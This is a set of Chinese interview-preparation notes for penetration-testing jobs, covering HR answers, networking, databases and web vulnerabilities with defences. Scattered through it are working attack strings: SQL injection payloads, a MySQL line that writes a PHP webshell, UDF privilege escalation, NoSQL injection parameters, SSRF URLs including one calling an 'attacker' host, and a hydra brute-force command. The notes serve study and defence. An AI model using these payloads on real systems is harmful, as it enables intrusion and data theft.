注意!HR面试的时候会有非常多的坑,熟悉我在这里写的问题,回答的时候情商高一点,不要跟HR吵起来,也不要有不合时宜的意见分歧,这个度的把控最好自己能让同学、朋友担任面试官,让他们多多挑你的刺,从而不断练习自己的反应能力。技术面试通过的,在HR这边通不过的例子是有很多的!
在信息安全行业比较知名,了解过公司的xx产品。(每次面试某个公司,都要花5-10分钟了解该公司的产品)
从我的经历上可以很清楚地看到我对网络安全的浓厚兴趣,我认为对本职工作有兴趣的人才能更好地完成这个工作。另外也有一句话说得很棒,“你之所以看不见黑暗,是因为有人拼命把它挡在你看不到的地方”,我认为做信息安全的尤其是渗透测试,就是为了更好地保护用户的安全,防患于未然,也是我想要应聘这个岗位的理由。(不要照背,体现自己的热爱和专业能力)
安全服务对象是人, 渗透测试对象是网站。(我的理解)
(此处自行组织语言,力求能将渗透测试讲得浅显易懂,时间控制在三分钟以内)
(对于不懂得安全的人来说,怎么能说服他需要进行渗透测试,渗透测试有什么作用)
正如前方所说,我学习能力很强,主观能动性强,能很快地做好下派的任务,所以我认为我能很好地胜任这个职位
渗透测试工程师->渗透测试项目负责人->安全架构师(安全咨询顾问)
个人规划和公司有冲突,缺少上升空间。(就算是因为钱少、和同事 打架 不和,也不要明说……)
月薪13-15K,可以接受1k的浮动
(表达自己的快速学习能力)
(表达综合素质方面,比如沟通能力好、领导能力好、文档能力好等等)
加班肯定是不可避免的,我可以接受项目需求的加班,毕竟完成工作是员工所要尽到的责任。同时我也会提高自己的工作效率,配合完成工作。(同样的,情商高一点,口头说要加班,入职之后要不要加班不就是……:>)
出现分歧是十分正常的事情,产生分歧很有可能是双方理解不一样,如何有效沟通、相互理解才是重中之重。在我看来还是会以大局出发,以有益于公司和客户的方向出发。
我在找工作之前,都会了解好这份工作的具体职责,如果我工作一段时间后发现工作不是想象中的,那只能说明我的职业目标不够清晰。(圆滑点)
我来求职都是为了能找到一个希望能提升自己的平台,我希望更能找到一个技术经验丰富的领导。
(最好是在安全领域方面的,说上一些黑客事件,表明自己热爱安全领域)
CONTACT ME:
三种主要的at batch cron,一般使用cron在规定的时间执行命令
定义: DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“黑掉”了对方的网站,而是冒名顶替、招摇撞骗罢了。
SYN攻击 防火墙、特征匹配
ACK FLOOD
UDP FLOOD
ICMP FLOOD
CC http的get请求
陆地攻击 源IP和目的IP都为同一个
UDP DNS QUERY 向被攻击的服务器发送大量的域名解析请求,通常请求解析的域名是随机生成或者是网络世界上根本不存在的域名,被攻击的DNS 服务器在接收到域名解析请求的时候首先会在服务器上查找是否有对应的缓存,如果查找不到并且该域名无法直接由服务器解析的时候,DNS 服务器会向其上层DNS服务器递归查询域名信息
权限管理,内网威胁,信息泄露,过于依赖托管厂商
虚拟机之间通信或上层主机的通信
信息安全管理的本质就是输入和输出。一般防范的风险为物理威胁和网络威胁。
防范风险可以从制度和流程(人员入离职流程、权限申请流程)、人员配备和知识积累、风险防范(物理威胁:门禁、监控、禁止USB设备接入、封闭PC、定时巡检;网络威胁:部署行为管控设备、可靠的网络结构、IP和MAC地址绑定,将网络行为分组、限制不必要的软件和通信协议、定期审核日志)
快速排序 冒泡排序
phnatomJS selenium execjs
https://www.cnblogs.com/yuanchenqi/articles/6755717.html#_label3
线程也叫轻量级进程,它是一个基本的CPU执行单元,也是程序执行过程中的最小单元,由线程ID、程序计数器、寄存器集合和堆栈共同组成。线程的引入减小了程序并发执行时的开销,提高了操作系统的并发性能。线程没有自己的系统资源。
异步是指进程不需要一直等下去,而是继续执行下面的操作,不管其他进程的状态。当有消息返回时系统会通知进程进行处理,这样可以提高执行的效率。
协程是一种用户态的轻量级线程,拥有自己的寄存器上下文和栈
IO多路复用 异步阻塞IO 线程轮询IO
一开始我以为是说字符编码,有UTF8 Unicode GBK。面试官还几番提醒我也没答上来。回来一想,我觉得他应该问的是content-type。 http://www.runoob.com/http/http-content-type.html
非对称加密 RSA、ElGamal、Rabin
对称加密 DES、3DES、AES
散列算法 MD5 SHA base64
拿下机器后
内网渗透使用代理访问内网 windows环境:reGeorg与proxifier Linux(kali-linux)环境:reGeorg与proxychains,使用nmap等工具进行扫描,发现web服务的主机和其它信息。有时这些边界机器上会记录一些内网服务器上的一些信息(用户 ssh known_hosts hosts 防火墙设置 记录、内网之间好多waf 规则基本都是空,大多数waf防外部威胁 这时候可以拿到探测的内部一些开放的端口判断进行渗透,通常用户这里基本是统一命名的 拿到的各种记录 会暴露出部分内网通讯的ip
内网内弱口令占大多数 FTP MSSQL 远程桌面链接
分词索引
nslookup http://xxx.com
国外dnshttps://toolbar.netcraft.com/site_report?url=www.xxx.com
BENCHMARK,Get_lock函数,当都被禁用后可以用计算量比较大的语句使数据库查询时间变长,从而达到延时注入的效果。
mysql:AND (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.SCHEMATA C);
尽量使用POST,限制GET;浏览器Cookie策略;加验证码; Referer Check;Anti CSRF Token
Cookie
xxe常见场景是如pdf在线解析、word在线解析、定制协议,留言板等,跟逻辑设计有关而与语言无关,最好是不要让XML作为参数传输或整体结构可被用户篡改。如果一定要使用,至少要禁用DTD、Entity。
xxe危害 读取本地文件,执行系统命令,探测内网端口,攻击内网服务
探测内网端口的协议有gopher file dict,不同语言支持不同的协议,是具体情况而定 file http ftp是常用的
防范,python用lxml时可以对resolve_entities设为false。或者过滤用户提交的xml
客户端也可以有xxe攻击,有的网站会使用office打开docx进行解析
Java解析XML的常用三方库,如果不禁用DTD、Entity都会导致XXE漏洞:
javax.xml.stream.XMLStreamReader;
javax.xml.parsers.DocumentBuilderFactory;
常见的是反序列化漏洞
常见的为解析漏洞,6.0有
/test.asp/test.jpg
test.asp;.jpg
7.5有test.jpg/.php,默认后缀IIS默认地还会解析其他后缀的文件为asp文件,比如cer asa cdx
原理大抵是IIS 5.x/6.0在从文件路径中读取文件后缀时,遇到一个“.”后,便进入了一种截断状态,在该状态下遇到特殊符号——“/”和“;”,都会进行截断,只保留特殊符号前的部分,即:“.asp”,从而认为文件后缀为“.asp”。
flask的模板注入 模板注入和常见Web注入的成因一样,也是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。
模板字符串中字符串拼接或替换可能会导致敏感信息泄露,获取变量值
如果开发者在flask使用字符串格式化,来将用户输入动态地加入到模板字符串中,而不是通过render_template_string函数,该函数不会对输入进行实体转义将URL传递进入模板内容当中,会导致xss的产生。
还可以利用模板中html标签属性字段绕过xss过滤。
Django出现过目录遍历漏洞
Http Trace攻击就可以将你的Header里的Cookie回显出来,利用Ajax或者flash就可以完成这种攻击;或者配置或者应用程序上可能Bypass,比如header头的泄漏
作者:华电许少 链接:https://zhuanlan.zhihu.com/p/142929260
https://zhuanlan.zhihu.com/p/25582026
给你一个网站你是如何来渗透测试的? - 杨文的文章 - 知乎 http://zhuanlan.zhihu.com/p/25605198
第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes
或者是借助 get_magic_quotes_gpc
对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是脏数据。
在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。
交友网站,填写年龄处是一个注入点,页面会显示出与你相同年龄的用户有几个。使用and 1=1确定注入点,用order by探测列数,union select探测输出点是第几列,
group_concat(schema_name) from information_schema.schemata
group_concat(table_name) from information_schema.schemata where table_schema='hhh'
concat(flag) from flag
修复:在从数据库或文件中取数据的时候,也要进行转义或者过滤。
进程是cpu资源分配的最小单位,线程是cpu调度的最小单位。以前进程既是资源分配也是调度的最小单位,后来为了更合理的使用cpu(实际上是cpu性能越来越好),才将资源分配和调度分开,就有了线程。线程是建立在进程的基础上的一次程序运行单位。
fortify用到什么模块? 过滤器 自定义规则 生成报告
https://zhuanlan.zhihu.com/p/26542790
PDCERF模型
分布式拒绝服务攻击(DDoS)是目前黑客经常采用而难以防范的攻击手段。DoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应。
DDOS攻击手段是在传统的DOS攻击基础之上产生的一类攻击方式。单一的DOS攻击一般是采用一对一方式的,当攻击目标CPU速度低、内存小或者网络带宽小等等各项性能指标不高它的效果是明显的。随着计算机与网络技术的发展,计算机的处理能力迅速增长,内存大大增加,同时也出现了千兆级别的网络,这使得DOS攻击的困难程度加大了——目标对恶意攻击包的“消化能力”加强了不少,例如你的攻击软件每秒钟可以发送3,000个攻击包,但我的主机与网络带宽每秒钟可以处理10,000个攻击包,这样一来攻击就不会产生什么效果这时侯分布式的拒绝服务攻击手段(DDOS)就应运而生了。
如果说计算机与网络的处理能力加大了10倍,用一台攻击机来攻击不再能起作用的话,攻击者使用10台攻击机同时攻击呢?用100台呢?DDOS就是利用更多的傀儡机来发起进攻,以比从前更大的规模来进攻受害者。通常,被攻击的服务器有以下症状:1、被攻击主机上有大量等待的TCP连接;2、网络中充斥着大量的无用的数据包,源地址为假;3、制造高流量无用数据,造成网络拥塞,使受害主机无法正常和外界通讯;4、利用受害主机提供的服务或传输协议上的缺陷,反复高速的发出特定的服务请求,使受害主机无法及时处理所有正常请求;5、严重时会造成系统死机
我司网站www.catroot.cn的IP 223.223.223.223 被人DDOS攻击,流量达9G,并且机房流量清洗无效,所以把223.223.223.223封停,导致网站不能访问,请作出紧急预案。
https://www.zhihu.com/question/19581905
free -m
`htopps top netstat ss
tracert
ifconfig
查看网卡流量,检查网卡的发送、接收数据情况NetHogs
实时监控带宽占用状况/var/log
ClamAV
杀毒软件用七八句话概括一下发现、验证漏洞细节、扮演角色、具体工作。
如果技术人员有兴趣会继续问,接着再引导到别处,让自己多说说细节。
相同价格增加订单数量,相同订单数量减少产品价格,订单价格设定为负数。
预防思路:
漏洞一般发生在账号密码找回、账号注册、支付订单等。验证码发送途径一般为手机短信、邮箱邮件
预防思路:
有些业务的接口,因为缺少了对用户的登陆凭证的效验或者是验证存在缺陷,导致黑客可以未经授权访问这些敏感信息甚至是越权操作。比如后台页面、订单ID枚举、敏感信息可下载、没验证ID或cookie验证导致越权。
预防思路:
预防思路:
在输入接口设置验证,如token,验证码等。如果设定验证码,最好不要单纯的采取一个前端验证,最好选择后端验证。如果设定token,请确保每个token只能采用一次,并且对token设定时间参数。
注册界面的接口不要返回太多敏感信息,以防遭到黑客制作枚举字典。
验证码不要用短数字,尽量6位以上,最好是以字母加数字进行组合,并且验证码需要设定时间期限。
优惠券,VIP卡号请尽量不要存在规律性和简短性,并且优惠券最好是以数字加字母进行组合。
预防思路
https://blog.csdn.net/ski_12/article/details/58188331
常用参数
-u 单个URL -m xx.txt 多个URL -d "mysql://user:password@10.10.10.137:3306/dvwa" 作为服务器客户端,直接连接数据库 --data post/get都适用 -p 指定扫描的参数 -r 读取文件 -f 指纹信息 --tamper 混淆脚本,用于应用层过滤 --cookie --user-agent --host等等http头的修改 --threads 并发线程 默认为1 --dbms MySQL<5.0> 指定数据库或版本 –level=LEVEL 执行测试的等级(1-5,默认为 1) –risk=RISK 执行测试的风险(0-3,默认为 1) Risk升高可造成数据被篡改等风险 –current-db / 获取当前数据库名称 –dbs 枚举数据库管理系统数据库 –tables 枚举 DBMS 数据库中的表 –columns 枚举 DBMS 数据库表列 -D DB 要进行枚举的数据库名 -T TBL 要进行枚举的数据库表 -C COL 要进行枚举的数据库列 -U USER 用来进行枚举的数据库用户
常用的tamper
本地:sqlmap-tamper分类.xlsx
base64encode.py #转为b64编码 charencode.py url编码 chardoubleencode.py 双URL编码 unmagicquotes.py 宽字节 randomcomments.py 用/**/分割SQL关键字 space2plus.py space2comment.py space2xxxx.py 替换空格为xx
nmap hostname/ip或者多个ip或者子网192.168.123.* -iL ip.txt 扫描ip.txt的所有ip -A 包含了-sV,-O,探测操作系统信息和路由跟踪。一般不用,是激烈扫描 -O 探测操作系统信息 -sV 查找主机服务版本号 -sA 探测该主机是否使用了包过滤器或防火墙 -sS 半开扫描,一般不会记入日志,不过需要root权限。 -sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批的链接请求以及错误信息。 -sP ping扫描,加上这个参数会使用ping扫描,只有主机存活,nmap才会继续扫描,一般最好不加,因为有的主机会禁止ping,却实际存在。 -sN TCP空扫描 -F 快速扫描 -Pn 扫描之前不使用ping,适用于防火墙禁止ping,比较有用。 -p 指定端口/端口范围 -oN 将报告写入文件 -v 详细信息 -T<0-5> 设定速度
Nmap还可以用到爆破等一些脚本
--script all 使用所有脚本 --script=sql.injection.nse sql注入 --script="smb*" 扫smb系列
使用内置模块。HR:常用的模块有哪些?
tcp反向链接 msfvenom
密码爆破工具,FTP,MSSQL,MYSQL,POP3,SSH,rdp,
hydra IP -l loginname -P pass.txt PROTROCL hydra 127.0.0.1 -l root -P pass.txt ssh
CTF
https://www.zhihu.com/question/22953267
information_schema
用的是该引擎事务是一组原子性的SQL语句或者说是一个独立的工作单元,如果数据库引擎能够成功对数据库应用这组SQL语句,那么就执行,如果其中有任何一条语句因为崩溃或其它原因无法执行,那么所有的语句都不会执行。也就是说,事务内的语句,要么全部执行成功,要么全部执行失败。
举个银行应用的典型例子:
假设银行的数据库有两张表:支票表和储蓄表,现在某个客户A要从其支票账户转移2000元到其储蓄账户,那么至少需求三个步骤:
a.检查A的支票账户余额高于2000元;
b.从A的支票账户余额中减去2000元;
c.在A的储蓄账户余额中增加2000元。
这三个步骤必须要打包在一个事务中,任何一个步骤失败,则必须要回滚所有的步骤,否则A作为银行的客户就可能要莫名损失2000元,就出问题了。这就是一个典型的事务,这个事务是不可分割的最小工作单元,整个事务中的所有操作要么全部提交成功,要么全部失败回滚,不可能只执行其中一部分,这也是事务的原子性特征。
读锁是共享的,即相互不阻塞的,多个客户在同一时刻可以读取同一资源,互不干扰。写锁是排他的,即一个写锁会阻塞其它的写锁和读锁,只有这样,才能确保给定时间内,只有一个用户能执行写入,防止其它用户读取正在写入的同一资源。写锁优先级高于读锁。
索引是帮助MySQL高效获取数据的数据结构。MYISAM和InnoDB存储引擎只支持BTree索引;MEMORY和HEAP储存引擎可以支持HASH和BTREE索引。
如果magic_quotes_gpc=On
,PHP解析器就会自动为post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符(认为是php的字符)引起的污染。
SET @var1=1
赋值show global variables \G;
和会话变量show session variables \G;
left(database(),1)>'s'
ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+
ascii(substr((select database()),1,1))=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23
regexp
正则注入 select user() regexp '^[a-z]';
select user() like 'ro%'
Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;
select '<?php phpinfo()> into outfile 'D:/shelltest.php'
dumpfile
file_put_contents
select unhex('udf.dll hex code') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';
可以UDF提权 https://www.cnblogs.com/milantgh/p/5444398.htmldisable_functions
,禁止了disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
,但是可以用dl扩展执行命令或者ImageMagick漏洞 https://www.waitalone.cn/imagemagic-bypass-disable_function.html通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。通常未经检查或者未经充分检查的用户输入数据或代码编写问题,意外变成了代码被执行。
https://blog.csdn.net/wjy397/article/details/53263281
# -- -- - //5.6.12特性,需要加空格 --+ // /**/ //c风格注释 /**//**/ //多个注释 /*letmetest*/ ; # 科学记数法 id=0e1union select # 空白字符 SQLite3 0A 0D 0C 09 20 MySQL5 09 0A 0B 0C 0D A0 20 PosgresSQL 0A 0D 0C 09 20 Oracle 11g 00 0A 0D 0C 09 20 MSSQL 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
报错注入 https://blog.csdn.net/like98k/article/details/79646512
# 常用 extractvalue updatexml 报错注入 UPDATEXML (XML_document, XPath_string, new_value); or updatexml(1, concat(0x7e, (version()), 0x7e), 0); > select * from users where id = 1 and updatexml(1, concat(0x7e, (version()), 0x7e), 0); > version() database() (SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1 floor() ceil() Mid(version(),1,1) Substr(version(),1,1) Substring(version(),1,1) concat(version(),'|',user()); concat_ws('|',1,2,3) Char(49) Hex('a') Unhex(61) 过滤了逗号 (1)limit处的逗号: limit 1 offset 0 (2)字符串截取处的逗号 mid处的逗号: mid(version() from 1 for 1)
unlencode base64 json binary querystring htmlencode unicode php serialize
id=1&id=2&id=3
id=1,2,3
关闭应用的错误提示
加waf
对输入进行过滤
限制输入长度
限制好数据库权限,drop/create/truncate等权限谨慎grant
预编译好sql语句,python和Php中一般使用?作为占位符。这种方法是从编程框架方面解决利用占位符参数的sql注入,只能说一定程度上防止注入。还有缓存溢出、终止字符等。
数据库信息加密安全(引导到密码学方面)。不采用md5因为有彩虹表,一般是一次md5后加盐再md5
清晰的编程规范,结对/自动化代码 review ,加大量现成的解决方案(PreparedStatement,ActiveRecord,歧义字符过滤, 只可访问存储过程 balabala)已经让 SQL 注入的风险变得非常低了。
具体的语言如何进行防注入,采用什么安全框架
作者:没啥意思
链接:https://www.zhihu.com/question/22953267/answer/23222069
来源:知乎
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
SQL注入问题既不能“靠用户(开发者也是用户)的自觉去避免”,也不能完全脱离用户(开发者也是用户)而指望数据库层面去避免。对于那些不了解SQL注入漏洞细节或不关心SQL注入漏洞或没精力去关心SQL注入漏洞的工程师,你要给他们一条尽可能简单可行透明的方案来避免SQL注入漏洞,告诉他这样写就可以了,这就是安全框架;然后告诉他或者让他的老大告诉他你必须这样写,这就是安全编码规范;然后你有手段在他没有这样写的时候能够检查出来(这比检查出漏洞要容易)并推动他改正,这就是白盒检查。
我们现在的互联网产品SQL注入漏洞仍然层出不穷,并不是这套思路有问题,相反恰恰是这套思路没有完善。一方面是框架方案本身不完善,以SQL注入漏洞为例,参数化是防SQL注入框架级方案的重要部分,但仅靠参数化没法很好满足开发过程中一些常见需求,如逗号分割的id列表问题、排序标记的问题等等(其实这些问题真要用参数化的方案解决也可以),使得开发更愿意在这些地方使用非参数化或伪参数化的方法(比如拼接SQL片段后再把整个片段当作参数扔进去exec)。这些问题在参数化的基础上,再加以改进,仍然守着拼接SQL片段时进行强类型转换的思路,仍然是能很好解决的,也就是继续完善参数化方案的问题,而不是看上去那样“参数化解决不了问题”。另一方面,安全编码规范的制定、培训、流程建设和实施保证上也做得远远不到位,开发leader们更希望后面的数据库或者前面的安全防御上能有手段去解决SQL注入问题,对于安全工程师来说,设置并维护几个特征串、语法分析场景也远比做那些安全框架、编码规范、白盒扫描来得要轻松实在,彼此在心照不宣中度过今天,自然不能指望明天能彻底踏实。
10年前就出了5.0,现在都到5.7了,没啥意义的问题
SQL关系型数据库,NoSQL(Not only SQL)非关系型数据库
关系型数据库是指用关系数学模型来表示的数据,其中是以二维表的形式描述数据。
采用键值对存储数据
非关系型数据库的产生是因为随着网站的进化,并发性增加,扩展性高,一致性要求降低。这样关系型数据库最重要的一致性维护就显得有点多余,并且消耗着性能。因此有了非关系型数据库,它可以算是关系型数据库的一种弱化的结果,在海量数据存储和查询上更胜一筹。
两种数据库没有好坏之分,只是使用的环境不一样。关系型数据库可以说是更严谨的,可靠性更强的数据库,在对于数据精度要求高的环境,比如说银行系统这样自然是像mysql这样的数据库适合。非关系型数据库胜在处理大数据的速度,但是对于数据的准确度没有那么高,对于操作量大的环境比如当前大部分web2.0的网站更加适用一些。
利用正则:找到y开头的name db.items.find({name: {$regex: "^y"}})
一些payload
?login[$regex]=^&password[$regex]=^
?login[$not][$type]=1&password[$not][$type]=1
xss学习 https://www.secpulse.com/?s=+%E9%82%A3%E4%BA%9B%E5%B9%B4%E6%88%91%E4%BB%AC%E4%B8%80%E8%B5%B7%E5%AD%A6XSS+
XSS是跨站脚本攻击,用户提交的数据中可以构造代码来执行,从而实现窃取用户信息等攻击。修复方式:对字符实体进行转义、使用HTTP Only来禁止JavaScript读取Cookie值、输入时校验、浏览器与Web应用端采用相同的字符编码。
CSRF是跨站请求伪造攻击,XSS是实现CSRF的诸多手段中的一种,是由于没有在关键操作执行时进行是否由用户自愿发起的确认。修复方式:筛选出需要防范CSRF的页面然后嵌入Token、再次输入密码、检验Referer.
XXE是XML外部实体注入攻击,XML中可以通过调用实体来请求本地或者远程内容,和远程文件保护类似,会引发相关安全问题,例如敏感文件读取。修复方式:XML解析库在调用时严格禁止对外部实体的解析。
http://www.ruanyifeng.com/blog/2016/04/same-origin-policy.html
浏览器安全的基石是"同源政策",目的是为了保证用户的信息安全,防止恶意网站窃取数据,避免cookie共享。同源含义是协议、域名、端口相同的两个网页才可以共用cookie。目前如果非同源,有三种行为收到限制:
- Cookie
、LocalStorage
和IndexDB
无法读取。
- DOM 无法获得。
- AJAX 请求不能发送
向服务器请求json数据回调,一般请求URL会加上&callback=xx
foo({ "ip": "8.8.8.8" });
由于<script>
元素请求的脚本,直接作为代码运行。这时,只要浏览器定义了foo函数,该函数就会立即调用。作为参数的JSON数据被视为JavaScript对象,而不是字符串,因此避免了使用JSON.parse的步骤。
http://blog.knownsec.com/2015/03/jsonp_security_technic/
防御:
WebSocket是一种通信协议,使用ws://(非加密)和wss://(加密)作为协议前缀。该协议不实行同源政策,只要服务器支持,就可以通过它进行跨源通信。
http://www.ruanyifeng.com/blog/2016/04/cors.html
CORS是跨源资源分享(Cross-Origin Resource Sharing)的缩写。它是W3C标准,是跨源AJAX请求的根本解决方法。相比JSONP只能发GET请求,CORS允许任何类型的请求。
CORS请求大致和ajax请求,但是在头信息中加上了Origin字段表明请求来自哪个源。如果orgin是许可范围之内的话,服务器返回的响应会多出Acess-Control-Allow-*
的字段
CORS与JSONP的使用目的相同,但是比JSONP更强大。
JSONP只支持GET
请求,CORS支持所有类型的HTTP请求。JSONP的优势在于支持老式浏览器,以及可以向不支持CORS的网站请求数据。
https://www.zhihu.com/question/26628342
存储型XSS:你发送一次带XSS代码的请求,以后这个页面的返回包里都会有XSS代码;
反射型XSS:你发送一次带XSS代码的请求,只能在当前返回的数据包中发现XSS代码;
DOM型XSS:你发送一次带XSS代码的请求,在返回包里压根儿就找不到XSS代码的影子;
https://www.zhihu.com/question/21979782
浏览器内容安全策略,减少xss攻击。
secpulse.com/archives/65832.html
利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。
ftp%26ip={ip}%26port={port}
举几个例子:
mongodb
的copyDatabase
函数,这点看猪猪侠讲的吧,没实践过。ImageMagick
,xml这些。source
,share
,link
,src
,imageurl
,target
等。http://example.com@127.0.0.1
http://127.0.0.1.xip.io/
可以指向任意ip的域名:xip.io
https://www.secpulse.com/archives/70471.html
接受ua为curl的时候,支持的协议有
使用curl -v http://xx.com/ssrf.php?url=sxxx
file:// ssrf.php?url=file:///etc/password Dict:// dict://<user-auth>@<host>:<port>/d:<word> ssrf.php?url=dict://attacker:11111/ SFTP:// ssrf.php?url=sftp://example.com:11111/ TFTP:// ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET LDAP:// ssrf.php?url=ldap://localhost:11211/%0astats%0aquit Gopher://
https://www.leavesongs.com/PYTHON/defend-ssrf-vulnerable-in-python.html
检查是否为内网IP地址
绕过方法:
利用八进制IP地址绕过
利用十六进制IP地址绕过
利用十进制的IP地址绕过
利用IP地址的省略写法绕过
最好的做法:IP地址转换为整数再进行判断
获取真正请求的host
如何正确的获取用户输入的URL的Host?
最常见的就是,使用http://233.233.233.233@10.0.0.1:8080/
、http://10.0.0.1#233.233.233.233
这样的URL,让后端认为其Host是233.233.233.233
,实际上请求的却是10.0.0.1
。这种方法利用的是程序员对URL解析的错误,有很多程序员甚至会用正则去解析URL。使用urllib.parse可以解析真正的hostname
只要Host只要不是内网IP即可吗?
host可能为ip,可能为域名,利用xip.io绕过。方法:判断是否为http协议,获取url的host,再解析该host,将解析到的ip再进行检查
只要Host指向的IP不是内网IP即可吗?
不一定,可能会30x跳转
归纳
解析目标URL,获取其Host
解析Host,获取Host指向的IP地址
检查IP地址是否为内网IP
请求URL
如果有跳转,拿出跳转URL,执行1
通过插件修改,一般抓包修改
https://blog.csdn.net/fuckcat_2333/article/details/52132559
php.ini
中开启allow_url_include
、allow_url_fopen
选项。开启后可以直接执行任意代码。include()
:使用此函数,只有代码执行到此函数时才将文件包含进来,发生错误时只警告并继续执行。
inclue_once()
:功能和前者一样,区别在于当重复调用同一文件时,程序只调用一次。
require()
:使用此函数,只要程序执行,立即调用此函数包含文件,发生错误时,会输出错误信息并立即终止程序。
require_once()
:功能和前者一样,区别在于当重复调用同一文件时,程序只调用一次。
allow_url_include=off
open_basedir=指定目录
,限制访问区域。../
等特殊符号magic_quotes_qpc=on
http://www.freebuf.com/articles/web/135953.html
SYN标志位为表示请求连接,ACK表示确认
客户端=主动关闭方
假设Client端发起中断连接请求,也就是发送FIN报文。Server端接到FIN报文后,意思是说"我Client端没有数据要发给你了",但是如果你还有数据没有发送完成,则不必急着关闭Socket,可以继续发送数据。所以你先发送ACK,“告诉Client端,你的请求我收到了,但是我还没准备好,请继续你等我的消息”。这个时候Client端就进入FIN_WAIT状态,继续等待Server端的FIN报文。当Server端确定数据已发送完成,则向Client端发送FIN报文,“告诉Client端,好了,我这边数据发完了,准备好关闭连接了”。Client端收到FIN报文后,"就知道可以关闭连接了,但是他还是不相信网络,怕Server端不知道要关闭,所以发送ACK后进入TIME_WAIT状态,如果Server端没有收到ACK则可以重传。“,Server端收到ACK后,“就知道可以断开连接了”。Client端等待了2MSL后依然没有收到回复,则证明Server端已正常关闭,那好,我Client端也可以关闭连接了。Ok,TCP连接就这样关闭了!
MSL=最大段寿命=TTL=最大生存时间=255s
物理层、数据链路层、网络层、传输层(TCP,UDP)、会话层(RPC,SQL)、表示层(定义数据格式及加密)、应用层(TELNET,HTTP,FTP)
每个公司有每个公司的基线规范体系,但是答题分为下列五个方面
/etc/login.defs
修改配置文件,设置过期时间、连续认证失败次数vi /etc/pam.d/su
添加auth required pam_wheel.so group=test
PermitRootLogin=no
MaxAuthTries=3
vi /etc/profile
添加行 umask 027
vi /etc/profile
修改配置文件,将以 TMOUT=
开头的行注释,设置为 TMOUT=180
https://www.alibabacloud.com/help/zh/faq-detail/52981.htm
https://blog.csdn.net/u011066706/article/details/51175971
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。
黑客通过浏览器以HTTP协议访问Web Server上的一个CGI文件,是一个合法的TCP连接,TCP/IP的应用层之下没有任何特征,只能在应用层进行检测。黑客入侵服务器,使用webshell,不管是传文件还是改文件,必然有一个文件会包含webshell代码,很容易想到从文件代码入手,这是静态特征检测;webshell运行后,B/S数据通过HTTP交互,HTTP请求/响应中可以找到蛛丝马迹,这是动态特征检测。
静态检测通过匹配特征码,特征值,危险函数函数来查找webshell的方法,只能查找已知的webshell,并且误报率漏报率会比较高,但是如果规则完善,可以减低误报率,但是漏报率必定会有所提高。
优点是快速方便,对已知的webshell查找准确率高,部署方便,一个脚本就能搞定。缺点漏报率、误报率高,无法查找0day型webshell,而且容易被绕过。
静态检测配合人工
一个检查工具 https://github.com/he1m4n6a/findWebshell
Linux下就是nobody用户起了bash,Win下就是IIS User启动cmd,这些都是动态特征。再者如果黑客反向连接的话,那很更容易检测了,Agent和IDS都可以抓现行。Webshell总有一个HTTP请求,如果我在网络层监控HTTP,并且检测到有人访问了一个从没反问过得文件,而且返回了200,则很容易定位到webshell,这便是http异常模型检测,就和检测文件变化一样,如果非管理员新增文件,则说明被人入侵了。
缺点也很明显,黑客只要利用原文件就很轻易绕过了,并且部署代价高,网站时常更新的话规则也要不断添加。
使用Webshell一般不会在系统日志中留下记录,但是会在网站的web日志中留下Webshell页面的访问数据和数据提交记录。日志分析检测技术通过大量的日志文件建立请求模型从而检测出异常文件,称之为:HTTP异常请求模型检测。
实现关键危险函数的捕捉方式
webshell由于往往经过了编码和加密,会表现出一些特别的统计特征,根据这些特征统计学习。
典型的代表: NeoPI – https://github.com/Neohapsis/NeoPI
https://blog.csdn.net/nohaoye/article/details/46987587
防范的措施大概有三种,第一种的思路是将专门存放上传文件的文件夹里面的脚本类型文件,解析成其他类型的文件,服务器不会以脚本类型来执行它。第二种是匹配文件夹里的脚本类型文件,将其设置为无法读取及操作。第三种是将文件上传到一个单独的文件夹,给一个二级的域名,然后不给这个虚拟站点解析脚本的权限,听说很多网站都用这种方式。
https://blog.csdn.net/kx_nullpointer/article/details/21299873
at
batch
crontab
anacron
:检测停机期间应该执行但是没有执行的任务,将检测到的任务检测一次网络 防火墙 配置 权限
https://www.zhihu.com/question/21427267
举例-阿里规范
用户历史命令记录
缺点:安全性不够。使用x-pack实现安全认证及权限管理功能
脱壳,反汇编
控制面板-管理工具-计划任务,在“任务计划程序库”上右键–创建基本任务
schtasks
命令
语法:
